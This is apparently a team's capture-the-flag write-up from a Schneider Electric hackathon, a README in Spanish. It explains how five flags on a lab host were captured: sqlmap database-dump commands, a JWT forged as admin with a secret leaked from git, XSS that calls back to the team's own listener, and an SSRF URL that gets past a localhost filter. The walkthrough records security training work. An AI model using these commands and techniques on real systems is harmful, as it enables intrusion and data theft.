Skip to content

Latest commit

 

History

History
61 lines (37 loc) · 2.82 KB

README.md

File metadata and controls

61 lines (37 loc) · 2.82 KB

Hackathon NUWE - Schneider Electric

Nombres:

Equipo/Mesa: 58

FLAG{ALWAYS_CHECK_COMMITS}

Para encontrar el git hemos seguido estos pasos:

  • url https definida en http://192.168.56.101/robots.txt
  • Modificar el etc/hosts para añadir 192.168.56.101 wp.geohome.com
  • Accediendo wp.geohome.com, se puede ver un link al github donde está el código fuente en el historial de commits.

imagen del commit donde hemos encontrado el flag

Imagen del commit donde hemos encontrado el flag

FLAG{Update_Plugins!}

python sqlmap.py -u "https://wp.geohome.com/wp-admin/admin-ajax.php?action=get_question&question_id=1" --tables

[20:04:16] [INFO] fetching number of tables for database 'flag' [20:04:16] [INFO] retrieved: 1 [20:04:18] [INFO] retrieved: flag

python sqlmap.py -u "https://wp.geohome.com/wp-admin/admin-ajax.php?action=get_question&question_id=1" --dump -D flag -T flag

[20:20:00] [INFO] fetching entries for table 'flag' in database 'flag' [20:20:00] [INFO] fetching number of entries for table 'flag' in database 'flag' [20:20:00] [INFO] retrieved: 1 [20:20:04] [INFO] retrieved: FLAG{Update_Plugins!}

API_FLAG{Never_public_your_secret}

Aprovechando la información del git donde muestra endpoints de register y login, hemos creado un usuario y nos hemos logeado para conseguir un access_token. Con ese token lo hemos pasado por jwt.io y hemos modificado el usuario por admin, y definido la JWT secret key del github "Ge0HomeIsThePlaceWhereFantasyMeetsReality" y hemos conseguido un nuevo access_token. Con ese nuevo token hemos hecho una petición postman apuntando al endpoint /admin, el endpoint /admin lo hemos recuperado con fuzz. Hacemos el fuzz para encontrar mas endpoints

cambiamos algunas cosas del token(user y le pinemos admin, y ponemos la JWT_SECRET_KEY

FLAG{sanitize_input}

Hacemos cross side scripting para enviar una peticion a nuestro kali

Hacemos cross side scripting para enviar una peticion a nuestro kali

Ponemos un listener en el teminal y cuando se envia la peticion nosotros con el listener la capturamos y conseguimos la flag

Ponemos un listener en el teminal y cuando se envia la peticion nosotros con el listener la capturamos y conseguimos la flag

FLAG{SSRF_PARA_TOD@S_XD}

Cambiamos la url para llegar al sitio concreto cambiando letras y todo

Para conseguir la Flag hemos usado el URL: http://192.168.56.101/testsite.php?url=http://locAlhost:1337